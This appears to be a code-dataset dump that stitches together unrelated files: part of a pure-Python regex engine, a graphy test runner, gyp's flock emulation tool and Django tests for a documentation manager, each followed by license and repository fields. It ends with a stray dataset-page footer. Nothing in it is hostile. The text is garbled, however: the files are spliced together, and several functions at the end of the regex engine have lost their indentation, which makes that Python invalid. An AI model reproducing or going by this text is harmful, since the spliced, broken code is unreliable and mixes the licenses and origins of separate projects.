        if maxcount < real_maxcount and maxcount != MAXREPEAT:
            real_maxcount = maxcount
        # XXX could special case every single character pattern here, as in C.
        # This is a general solution, a bit hackisch, but works and should be
        # efficient.
        code_position = ctx.code_position
        string_position = ctx.string_position
        ctx.skip_code(4)
        reset_position = ctx.code_position
        while count < real_maxcount:
            # this works because the single character pattern is followed by
            # a success opcode
            ctx.code_position = reset_position
            self.dispatch(ctx.peek_code(), ctx)
            #print("count_repetitions", ctx.has_matched, count)
            if ctx.has_matched is False: # could be None as well
                break
            count += 1
            ctx.has_matched = None
        # restore the cursors; only the count is the result
        ctx.code_position = code_position
        ctx.string_position = string_position
        return count

    def _log(self, context, opname, *args):
        # Debug helper; relies on a module-level _log function
        # (presumably defined elsewhere in this file — TODO confirm).
        arg_string = ("%s " * len(args)) % args
        _log("|%s|%s|%s %s" % (context.pattern_codes,
            context.string_position, opname, arg_string))
# Register every op_* handler under its OPCODES value.
_OpcodeDispatcher.build_dispatch_table(OPCODES, "op_")
class _CharsetDispatcher(_Dispatcher):
    """Decides whether ``self.char`` belongs to an <IN> character set.

    Handlers return ``self.ok`` on a hit, ``not self.ok`` on <FAILURE>,
    and None to keep scanning the remaining set members; <NEGATE> flips
    the polarity stored in ``self.ok``.
    """

    def __init__(self):
        self.ch_dispatcher = _ChcodeDispatcher()

    def reset(self, char):
        # character code under test, and the polarity of a hit
        self.char = char
        self.ok = True

    def set_failure(self, ctx):
        # <FAILURE> terminates the set: no member matched.
        return not self.ok

    def set_literal(self, ctx):
        # <LITERAL> <code>
        if ctx.peek_code(1) == self.char:
            return self.ok
        else:
            ctx.skip_code(2)

    def set_category(self, ctx):
        # <CATEGORY> <code>
        if self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
            return self.ok
        else:
            ctx.skip_code(2)

    def set_charset(self, ctx):
        # <CHARSET> <bitmap> (16 bits per code word)
        char_code = self.char
        ctx.skip_code(1) # point to beginning of bitmap
        if CODESIZE == 2:
            if char_code < 256 and ctx.peek_code(char_code >> 4) \
                    & (1 << (char_code & 15)):
                return self.ok
            ctx.skip_code(16) # skip bitmap
        else:
            if char_code < 256 and ctx.peek_code(char_code >> 5) \
                    & (1 << (char_code & 31)):
                return self.ok
            ctx.skip_code(8) # skip bitmap

    def set_range(self, ctx):
        # <RANGE> <lower> <upper>
        if ctx.peek_code(1) <= self.char <= ctx.peek_code(2):
            return self.ok
        ctx.skip_code(3)

    def set_negate(self, ctx):
        # <NEGATE>: invert the meaning of every subsequent test.
        self.ok = not self.ok
        ctx.skip_code(1)

    #fixme brython. array module doesn't exist
    def set_bigcharset(self, ctx):
        # BUG FIX: previously raised NameError because "NotImplementationError"
        # is not a real exception class; NotImplementedError was intended.
        raise NotImplementedError("_sre.py: set_bigcharset, array not implemented")
        # <BIGCHARSET> <blockcount> <256 blockindices> <blocks>
        # NOTE: everything below is unreachable until the array-based
        # implementation above is ported.
        char_code = self.char
        count = ctx.peek_code(1)
        ctx.skip_code(2)
        if char_code < 65536:
            block_index = char_code >> 8
            # NB: there are CODESIZE block indices per bytecode
            a = array.array("B")
            a.fromstring(array.array(CODESIZE == 2 and "H" or "I",
                    [ctx.peek_code(block_index // CODESIZE)]).tostring())
            block = a[block_index % CODESIZE]
            ctx.skip_code(256 // CODESIZE) # skip block indices
            block_value = ctx.peek_code(block * (32 // CODESIZE)
                    + ((char_code & 255) >> (CODESIZE == 2 and 4 or 5)))
            if block_value & (1 << (char_code & ((8 * CODESIZE) - 1))):
                return self.ok
        else:
            ctx.skip_code(256 // CODESIZE) # skip block indices
            ctx.skip_code(count * (32 // CODESIZE)) # skip blocks

    def unknown(self, ctx):
        # Unrecognized set opcode: treat as a definitive non-match.
        return False
_CharsetDispatcher.build_dispatch_table(OPCODES, "set_")
class _AtcodeDispatcher(_Dispatcher):
    """Implements the AT codes: zero-width position assertions (^, $, \\b, \\B
    and friends).  Each handler returns a boolean for the current position."""
    def at_beginning(self, ctx):
        # True only at the very start of the string.
        return ctx.at_beginning()
    at_beginning_string = at_beginning
    def at_beginning_line(self, ctx):
        # Start of string, or the previous character is a linebreak.
        return ctx.at_beginning() or _is_linebreak(ctx.peek_char(-1))
    def at_end(self, ctx):
        # End of string, or exactly one character left and it is a linebreak.
        return (ctx.remaining_chars() == 1 and ctx.at_linebreak()) or ctx.at_end()
    def at_end_line(self, ctx):
        # Immediately before any linebreak, or at end of string.
        return ctx.at_linebreak() or ctx.at_end()
    def at_end_string(self, ctx):
        # Absolute end of the string only.
        return ctx.at_end()
    def at_boundary(self, ctx):
        # Word boundary using the ASCII word-character test.
        return ctx.at_boundary(_is_word)
    def at_non_boundary(self, ctx):
        return not ctx.at_boundary(_is_word)
    def at_loc_boundary(self, ctx):
        # Word boundary using the locale (Latin-1 alnum or '_') test.
        return ctx.at_boundary(_is_loc_word)
    def at_loc_non_boundary(self, ctx):
        return not ctx.at_boundary(_is_loc_word)
    def at_uni_boundary(self, ctx):
        # Word boundary using the Unicode (any alnum or '_') test.
        return ctx.at_boundary(_is_uni_word)
    def at_uni_non_boundary(self, ctx):
        return not ctx.at_boundary(_is_uni_word)
    def unknown(self, ctx):
        # Unrecognized AT code: assertion fails.
        return False

# Register handlers against the AT codes (empty prefix: names match codes).
_AtcodeDispatcher.build_dispatch_table(ATCODES, "")
class _ChcodeDispatcher(_Dispatcher):
    """Implements the CATEGORY codes: tests the character at the current
    string position against a class (digit/space/word/linebreak), in plain
    ASCII, locale-aware and Unicode variants."""
    def category_digit(self, ctx):
        return _is_digit(ctx.peek_char())
    def category_not_digit(self, ctx):
        return not _is_digit(ctx.peek_char())
    def category_space(self, ctx):
        return _is_space(ctx.peek_char())
    def category_not_space(self, ctx):
        return not _is_space(ctx.peek_char())
    def category_word(self, ctx):
        return _is_word(ctx.peek_char())
    def category_not_word(self, ctx):
        return not _is_word(ctx.peek_char())
    def category_linebreak(self, ctx):
        return _is_linebreak(ctx.peek_char())
    def category_not_linebreak(self, ctx):
        return not _is_linebreak(ctx.peek_char())
    def category_loc_word(self, ctx):
        return _is_loc_word(ctx.peek_char())
    def category_loc_not_word(self, ctx):
        return not _is_loc_word(ctx.peek_char())
    def category_uni_digit(self, ctx):
        # Unicode-aware digit test: defers to str.isdigit().
        return ctx.peek_char().isdigit()
    def category_uni_not_digit(self, ctx):
        return not ctx.peek_char().isdigit()
    def category_uni_space(self, ctx):
        return ctx.peek_char().isspace()
    def category_uni_not_space(self, ctx):
        return not ctx.peek_char().isspace()
    def category_uni_word(self, ctx):
        return _is_uni_word(ctx.peek_char())
    def category_uni_not_word(self, ctx):
        return not _is_uni_word(ctx.peek_char())
    def category_uni_linebreak(self, ctx):
        # Unicode linebreaks come from the static _uni_linebreaks list below.
        return ord(ctx.peek_char()) in _uni_linebreaks
    def category_uni_not_linebreak(self, ctx):
        return ord(ctx.peek_char()) not in _uni_linebreaks
    def unknown(self, ctx):
        # Unrecognized category code: no match.
        return False

# Register handlers against the CH codes (empty prefix: names match codes).
_ChcodeDispatcher.build_dispatch_table(CHCODES, "")
# Per-character classification flags for ASCII codepoints 0-127.  Bits used
# by the helpers below: 1 = decimal digit (_is_digit), 2 = whitespace
# (_is_space), 16 = word character (_is_word; letters, digits, '_' -> 16).
# NOTE(review): the remaining bits (4, 8) appear to follow _sre.c's
# linebreak/alnum convention (e.g. '\n' at index 10 is 6 = space|linebreak,
# digits are 25 = word|8|digit) -- confirm against CPython's _sre.c.
_ascii_char_info = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 6, 2,
    2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 25, 25, 25, 25, 25, 25, 25,
    25, 25, 0, 0, 0, 0, 0, 0, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
    24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0,
    0, 0, 16, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
    24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0, 0, 0, 0 ]
def _is_digit(char):
    """Non-zero if *char* is an ASCII decimal digit ('0'-'9')."""
    code = ord(char)
    if code >= 128:
        # Non-ASCII characters are never plain digits in this table.
        return False
    return _ascii_char_info[code] & 1
def _is_space(char):
    """Non-zero if *char* is ASCII whitespace per the flag table."""
    code = ord(char)
    if code >= 128:
        # Non-ASCII characters are never whitespace in this table.
        return False
    return _ascii_char_info[code] & 2
def _is_word(char):
    """Non-zero if *char* is an ASCII word character (letter, digit, '_')."""
    # NB: non-ASCII chars aren't words according to _sre.c
    code = ord(char)
    if code >= 128:
        return False
    return _ascii_char_info[code] & 16
def _is_loc_word(char):
return (not (ord(char) & ~255) and char.isalnum()) or char == '_'
def _is_uni_word(char):
# not valid in python 3
#return unichr(ord(char)).isalnum() or char == '_'
return chr(ord(char)).isalnum() or char == '_'
def _is_linebreak(char):
return char == "\n"
# Static list of all unicode codepoints reported by Py_UNICODE_ISLINEBREAK.
# (LF, CR, FS, GS, RS, NEL, LINE SEPARATOR, PARAGRAPH SEPARATOR)
_uni_linebreaks = [10, 13, 28, 29, 30, 133, 8232, 8233]
def _log(message):
if 0:
print(message)
| agpl-3.0 |
SummerLW/Perf-Insight-Report | third_party/graphy/graphy/all_tests.py | 36 | 1599 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run all tests from *_test.py files."""
import os
import unittest
def ModuleName(filename, base_dir):
    """Given a filename, convert to the python module name.

    Strips *base_dir* and any leading separator, replaces path separators
    with dots, and drops a trailing '.py' extension.
    """
    rel = filename.replace(base_dir, '').lstrip(os.path.sep)
    dotted = rel.replace(os.path.sep, '.')
    return dotted[:-3] if dotted.endswith('.py') else dotted
def FindTestModules():
    """Return names of any test modules (*_test.py).

    Walks the directory containing this file and converts every matching
    filename into a dotted module name via ModuleName().
    """
    tests = []
    start_dir = os.path.dirname(os.path.abspath(__file__))
    for dirpath, subdirs, files in os.walk(start_dir):
        # Skip Subversion metadata directories.  FIX: the original tested
        # hard-coded '/' separators (broken on Windows) and shadowed the
        # builtin ``dir``; splitting on os.path.sep is portable.
        if '.svn' in dirpath.split(os.path.sep):
            continue
        tests.extend(ModuleName(os.path.join(dirpath, f), start_dir) for f
                     in files if f.endswith('_test.py'))
    return tests
def AllTests():
    """Build a single TestSuite from every discovered *_test module."""
    module_names = FindTestModules()
    loaded = unittest.defaultTestLoader.loadTestsFromNames(module_names)
    return unittest.TestSuite(loaded)
if __name__ == '__main__':
    # Run everything: defaultTest points unittest at the AllTests() suite
    # factory above; module=None forces name-based resolution.
    unittest.main(module=None, defaultTest='__main__.AllTests')
| bsd-3-clause |
tpratama/warkop-TC | assets/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/flock_tool.py | 604 | 1533 | #!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""These functions are executed via gyp-flock-tool when using the Makefile
generator. Used on systems that don't have a built-in flock."""
import fcntl
import os
import struct
import subprocess
import sys
def main(args):
    """Command-line entry point: dispatch *args* to the flock emulator."""
    FlockTool().Dispatch(args)
class FlockTool(object):
    """This class emulates the 'flock' command."""

    def Dispatch(self, args):
        """Dispatches a string command to a method.

        args[0] names the command (e.g. 'flock' -> ExecFlock); the remaining
        items are passed through as positional arguments.
        Raises Exception when no command is given.
        """
        if len(args) < 1:
            raise Exception("Not enough arguments")
        method = "Exec%s" % self._CommandifyName(args[0])
        getattr(self, method)(*args[1:])

    def _CommandifyName(self, name_string):
        """Transforms a tool name like copy-info-plist to CopyInfoPlist"""
        return name_string.title().replace('-', '')

    def ExecFlock(self, lockfile, *cmd_list):
        """Emulates the most basic behavior of Linux's flock(1).

        Acquires a write lock on *lockfile*, then runs *cmd_list* and
        returns its exit status.
        """
        # Rely on exception handling to report errors.
        # Note that the stock python on SunOS has a bug
        # where fcntl.flock(fd, LOCK_EX) always fails
        # with EBADF, that's why we use this F_SETLK
        # hack instead.
        # FIX: 0666 is a Python 2-only octal literal (SyntaxError on
        # Python 3); 0o666 is accepted by Python 2.6+ and 3 alike.
        fd = os.open(lockfile, os.O_WRONLY | os.O_NOCTTY | os.O_CREAT, 0o666)
        op = struct.pack('hhllhhl', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0)
        fcntl.fcntl(fd, fcntl.F_SETLK, op)
        return subprocess.call(cmd_list)
if __name__ == '__main__':
    # main() returns None, so sys.exit(None) reports success (status 0);
    # errors surface as exceptions with a non-zero interpreter exit.
    sys.exit(main(sys.argv[1:]))
| mit |
MOOCworkbench/MOOCworkbench | docs_manager/tests/tests.py | 1 | 6482 | from unittest.mock import patch
from django.contrib.auth.models import User
from django.core.management import call_command
from django.shortcuts import reverse
from django.test import Client, TestCase
from dataschema_manager.models import DataSchema
from experiments_manager.models import Experiment
from git_manager.models import GitRepository
from helpers.helper import ExperimentPackageTypeMixin
from user_manager.models import WorkbenchUser
class DocsManagerTestCase(TestCase):
    """Integration tests for the docs_manager views: documentation display,
    status reporting, enable/disable toggling and generation, exercised
    against a fixture-loaded workbench experiment."""

    def setUp(self):
        """Load workbench fixtures and create the user, git repository,
        data schema and experiment that every test operates on."""
        call_command('loaddata', 'fixtures/steps.json', verbosity=0)
        call_command('loaddata', 'fixtures/measures.json', verbosity=0)
        call_command('loaddata', 'fixtures/package_categories_languages.json', verbosity=0)
        call_command('loaddata', 'fixtures/cookiecutter.json', verbosity=0)
        self.user = User.objects.create_user('test', 'test@test.nl', 'test')
        # NOTE(review): the WorkbenchUser is looked up rather than created,
        # presumably produced as a side effect of User creation -- confirm.
        self.workbench_user = WorkbenchUser.objects.get(user=self.user)
        self.second_user = User.objects.create_user('test2', 'test@test.nl', 'test2')
        self.git_repo = GitRepository.objects.create(name='Experiment', owner=self.workbench_user, github_url='https://github')
        schema = DataSchema(name='main')
        schema.save()
        self.experiment = Experiment.objects.create(title='Experiment',
                                                    description='test',
                                                    owner=self.workbench_user,
                                                    git_repo=self.git_repo,
                                                    language_id=2,
                                                    template_id=2,
                                                    schema=schema)
        self.client = Client()
        self.client.login(username='test', password='test')

    @patch('git_manager.helpers.language_helper.GitHubHelper')
    @patch('git_manager.helpers.language_helper.SphinxHelper')
    def test_doc_experiment_view(self, mock_gh_helper, mock_sphinx_helper):
        """
        Test if the DocExperimentView loads, for the default documentation view.
        :param mock_gh_helper: Autoloaded by the mock framework
        :param mock_sphinx_helper: Autoloaded by the mock framework
        :return:
        """
        response = self.client.get(reverse('docs_view', kwargs={'object_id': 1,
                                   'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
        # The view answers with a redirect (302).
        self.assertEqual(response.status_code, 302)

    @patch('git_manager.helpers.language_helper.GitHubHelper')
    @patch('git_manager.helpers.language_helper.SphinxHelper')
    def test_doc_experiment_view_with_page_slug(self, mock_gh_helper, mock_sphinx_helper):
        """
        Test if the DocExperimentView loads, given a pageslug to load.
        :param mock_gh_helper: Autoloaded by the mock framework
        :param mock_sphinx_helper: Autoloaded by the mock framework
        :return:
        """
        response = self.client.get(reverse('docs_view', kwargs={'object_id': 1,
                                   'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE,
                                   'page_slug': 'test'}))
        self.assertEqual(response.status_code, 302)

    def test_doc_status_view(self):
        """
        Test if the doc status view loads successfully and exposes the
        experiment and its docs in the template context.
        :return:
        """
        response = self.client.get(reverse('docs_status', kwargs={'object_id': 1,
                                   'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
        self.assertEqual(response.context['object'], self.experiment)
        self.assertEqual(response.context['docs'], self.experiment.docs)

    def test_toggle_doc_status_true_to_false(self):
        """
        Test if the documentation status is toggled from True to False.
        :return:
        """
        docs = self.experiment.docs
        docs.enabled = True
        docs.save()
        response = self.client.get(reverse('toggle_docs_status', kwargs={'object_id': 1,
                                   'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
        self.assertEqual(response.status_code, 302)
        # Re-read from the database to observe the toggled flag.
        docs.refresh_from_db()
        self.assertFalse(docs.enabled)

    @patch('docs_manager.views.GitHubHelper')
    @patch('docs_manager.views.GitHelper')
    def test_toggle_doc_status_false_to_true(self, mock_gh_helper, mock_git_helper):
        """
        Test if the documentation status is toggled from False to True.
        :return:
        """
        docs = self.experiment.docs
        docs.enabled = False
        docs.save()
        response = self.client.get(reverse('toggle_docs_status', kwargs={'object_id': 1,
                                   'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
        self.assertEqual(response.status_code, 302)
        docs.refresh_from_db()
        self.assertTrue(docs.enabled)

    @patch('git_manager.helpers.language_helper.GitHubHelper')
    @patch('docs_manager.views.GitHelper')
    @patch('git_manager.helpers.language_helper.SphinxHelper')
    def test_docs_generate_enabled(self, mock_gh_helper, mock_git_helper, mock_sphinx_helper):
        """
        Test if the documentation generation view loads when docs are enabled.
        :return:
        """
        response = self.client.get(reverse('docs_generate', kwargs={'object_id': 1,
                                   'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
        self.assertEqual(response.status_code, 200)

    @patch('git_manager.helpers.language_helper.GitHubHelper')
    @patch('docs_manager.views.GitHelper')
    @patch('git_manager.helpers.language_helper.SphinxHelper')
    def test_docs_generate_disabled(self, mock_gh_helper, mock_git_helper, mock_sphinx_helper):
        """
        Test if the documentation generation view loads when docs are disabled.
        :return:
        """
        docs = self.experiment.docs
        docs.enabled = False
        docs.save()
        response = self.client.get(reverse('docs_generate', kwargs={'object_id': 1,
                                   'object_type': ExperimentPackageTypeMixin.EXPERIMENT_TYPE}))
        self.assertEqual(response.status_code, 200)
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.